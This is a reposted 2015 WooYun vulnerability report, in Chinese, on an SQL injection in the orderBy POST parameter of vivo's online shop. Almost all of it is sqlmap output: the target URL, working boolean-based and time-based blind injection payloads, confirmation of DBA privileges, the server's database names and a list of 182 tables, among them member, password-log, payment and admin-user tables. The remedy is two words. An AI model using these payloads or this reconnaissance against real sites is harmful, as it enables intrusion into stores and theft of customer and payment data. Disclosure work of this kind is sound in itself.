记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

手机行业安全之vivo智能手机某站SQL注入(DBA权限)

2015-09-16 23:00

code 区域
http://shop.vivo.com.cn/gallery-ajax_get_goods.html



post参数:

cat_id=&orderBy=*&scontent=n,e&showtype=grid&&virtual_cat_id=



orderBy参数存在注入





漏洞证明:

code 区域
sqlmap identified the following injection points with a total of 522 HTTP(s) requests:

---

Parameter: #1* ((custom) POST)

Type: boolean-based blind

Title: MySQL >= 5.0 boolean-based blind - Parameter replace

Payload: cat_id=&orderBy=(SELECT (CASE WHEN (2977=2977) THEN 2977 ELSE 2977*(SELECT 2977 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=

Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 time-based blind - Parameter replace

Payload: cat_id=&orderBy=(SELECT (CASE WHEN (3089=3089) THEN SLEEP(5) ELSE 3089*(SELECT 3089 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=

Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

---

web application technology: Nginx, PHP 5.3.25

back-end DBMS: MySQL 5.0

current user: '[email protected] %'

current database: 'vivo_store'

current user is DBA: True

available databases [8]:

[*] cacti

[*] information_schema

[*] mysql

[*] performance_schema

[*] seckill

[*] test

[*] vivo04e9

[*] vivo_chk



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: #1* ((custom) POST)

Type: boolean-based blind

Title: MySQL >= 5.0 boolean-based blind - Parameter replace

Payload: cat_id=&orderBy=(SELECT (CASE WHEN (2977=2977) THEN 2977 ELSE 2977*(SELECT 2977 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=

Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 time-based blind - Parameter replace

Payload: cat_id=&orderBy=(SELECT (CASE WHEN (3089=3089) THEN SLEEP(5) ELSE 3089*(SELECT 3089 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=

Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

---

web application technology: Nginx, PHP 5.3.25

back-end DBMS: MySQL 5.0

Database: vivo_store

[182 tables]

+-----------------------------------------+

| sdb_aftersales_return_product |

| sdb_apiactionlog_apilog |

| sdb_b2c_archive_orders |

| sdb_b2c_brand |

| sdb_b2c_cart |

| sdb_b2c_cart_objects |

| sdb_b2c_college |

| sdb_b2c_comment_goods_point |

| sdb_b2c_comment_goods_type |

| sdb_b2c_contract_package |

| sdb_b2c_contract_package_numbers |

| sdb_b2c_counter |

| sdb_b2c_counter_attach |

| sdb_b2c_coupon_map |

| sdb_b2c_coupon_vivo |

| sdb_b2c_coupon_vivo_info |

| sdb_b2c_coupon_vivo_list |

| sdb_b2c_coupon_vivo_xshot |

| sdb_b2c_coupons |

| sdb_b2c_delivery |

| sdb_b2c_delivery_items |

| sdb_b2c_dly_h_area |

| sdb_b2c_dlycorp |

| sdb_b2c_dlytype |

| sdb_b2c_flashlottery_award |

| sdb_b2c_flashlottery_log |

| sdb_b2c_flashlottery_winner |

| sdb_b2c_goods |

| sdb_b2c_goods_cat |

| sdb_b2c_goods_contract_package |

| sdb_b2c_goods_keywords |

| sdb_b2c_goods_lv_price |

| sdb_b2c_goods_promotion_ref |

| sdb_b2c_goods_question |

| sdb_b2c_goods_rate |

| sdb_b2c_goods_spec_index |

| sdb_b2c_goods_store_prompt |

| sdb_b2c_goods_type |

| sdb_b2c_goods_type_props |

| sdb_b2c_goods_type_props_value |

| sdb_b2c_goods_type_spec |

| sdb_b2c_goods_virtual_cat |

| sdb_b2c_lottery_award |

| sdb_b2c_lottery_log |

| sdb_b2c_lottery_winner |

| sdb_b2c_member_addrs |

| sdb_b2c_member_advance |

| sdb_b2c_member_college |

| sdb_b2c_member_comments |

| sdb_b2c_member_coupon |

| sdb_b2c_member_goods |

| sdb_b2c_member_limit_ip |

| sdb_b2c_member_lv |

| sdb_b2c_member_msg |

| sdb_b2c_member_point |

| sdb_b2c_member_pwdlog |

| sdb_b2c_member_secret |

| sdb_b2c_member_share_history |

| sdb_b2c_member_systmpl |

| sdb_b2c_members |

| sdb_b2c_order_coupon_user |

| sdb_b2c_order_delivery |

| sdb_b2c_order_items |

| sdb_b2c_order_log |

| sdb_b2c_order_objects |

| sdb_b2c_order_pmt |

| sdb_b2c_orders |

| sdb_b2c_preorders_sales_rule |

| sdb_b2c_products |

| sdb_b2c_reship |

| sdb_b2c_reship_items |

| sdb_b2c_sales_rule_goods |

| sdb_b2c_sales_rule_order |

| sdb_b2c_sell_logs |

| sdb_b2c_shop |

| sdb_b2c_spec_values |

| sdb_b2c_specification |

| sdb_b2c_type_brand |

| sdb_b2c_xfive_coupon_log |

| sdb_b2c_xfiveblue_preorder |

| sdb_b2c_xfivepro_preorder |

| sdb_base_app_content |

| sdb_base_apps |

| sdb_base_cache_expires |

| sdb_base_crontab |

| sdb_base_files |

| sdb_base_kvstore |

| sdb_base_network |

| sdb_base_queue |

| sdb_base_rpcnotify |

| sdb_base_rpcpoll |

| sdb_base_syscache_resources |

| sdb_content_article_bodys |

| sdb_content_article_indexs |

| sdb_content_article_nodes |

| sdb_couponlog_order_coupon_ref |

| sdb_couponlog_order_coupon_user |

| sdb_dbeav_meta_register |

| sdb_dbeav_meta_value_datetime |

| sdb_dbeav_meta_value_decimal |

| sdb_dbeav_meta_value_int |

| sdb_dbeav_meta_value_longtext |

| sdb_dbeav_meta_value_text |

| sdb_dbeav_meta_value_varchar |

| sdb_dbeav_recycle |

| sdb_desktop_filter |

| sdb_desktop_flow |

| sdb_desktop_hasrole |

| sdb_desktop_menus |

| sdb_desktop_recycle |

| sdb_desktop_role_flow |

| sdb_desktop_roles |

| sdb_desktop_tag |

| sdb_desktop_tag_rel |

| sdb_desktop_user_flow |

| sdb_desktop_users |

| sdb_ectools_analysis |

| sdb_ectools_analysis_logs |

| sdb_ectools_currency |

| sdb_ectools_order_bills |

| sdb_ectools_payments |

| sdb_ectools_payments_log_callback |

| sdb_ectools_payments_log_request |

| sdb_ectools_refunds |

| sdb_ectools_regions |

| sdb_express_dly_center |

| sdb_express_print_tmpl |

| sdb_gift_cat |

| sdb_gift_ref |

| sdb_image_image |

| sdb_image_image_attach |

| sdb_importexport_task |

| sdb_logisticstrack_logistic_log |

| sdb_operatorlog_logs |

| sdb_operatorlog_normallogs |

| sdb_operatorlog_register |

| sdb_pam_account |

| sdb_pam_auth |

| sdb_pam_bind_tag |

| sdb_pam_log |

| sdb_pointprofessional_member_point_task |

| sdb_preorderlog_order_preorder_user |

| sdb_site_activities_survey |

| sdb_site_activities_xfivepro |

| sdb_site_explorers |

| sdb_site_index_page |

| sdb_site_link |

| sdb_site_lucky_draw |

| sdb_site_menus |

| sdb_site_modules |

| sdb_site_purchase |

| sdb_site_route_statics |

| sdb_site_seo |

| sdb_site_themes |

| sdb_site_themes_file |

| sdb_site_themes_tmpl |

| sdb_site_widgets |

| sdb_site_widgets_instance |

| sdb_site_widgets_proinstance |

| sdb_system_matrixset |

| sdb_system_queue_mysql |

| sdb_timedbuy_objitems |

| sdb_upimage_upimage |

| sdb_wap_explorers |

| sdb_wap_menus |

| sdb_wap_modules |

| sdb_wap_seo |

| sdb_wap_themes |

| sdb_wap_themes_file |

| sdb_wap_themes_tmpl |

| sdb_wap_widgets |

| sdb_wap_widgets_instance |

| sdb_weixin_alert |

| sdb_weixin_bind |

| sdb_weixin_menus |

| sdb_weixin_message |

| sdb_weixin_message_image |

| sdb_weixin_message_text |

| sdb_weixin_safeguard |

| tmp_53aa3e378d690 |

| tmp_53bbb6d760ad5 |

| tmp_53bbc08212460 |

+-----------------------------------------+

修复方案:

参数过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0130324

阅读:141310 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“手机行业安全之vivo智能手机某站SQL注入(DBA权限)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词